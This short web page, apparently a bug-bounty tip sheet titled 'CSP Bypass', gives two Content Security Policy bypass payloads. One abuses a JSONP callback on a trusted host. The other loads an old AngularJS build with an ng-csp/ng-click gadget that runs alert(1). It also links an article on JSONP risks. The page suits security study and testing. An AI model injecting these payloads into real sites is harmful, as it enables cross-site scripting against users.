CSP Bypass
Last updated
Last updated
#JSONP: <script src="https://trustedsite/jsonp?callback=payload"> #AngularJS <script src="https://trustedsite/angularjs/1.1.3/angularjs.min.js"> <div ng-app ng-csp id=p ng-click=$event.view.alert(1)> #BugBountyTip
JSONP can be a serious security vulnerability. Another good read from my colleague :) Accessing cross-site data using JSONPsjoerdlangkemper.nl
Articles: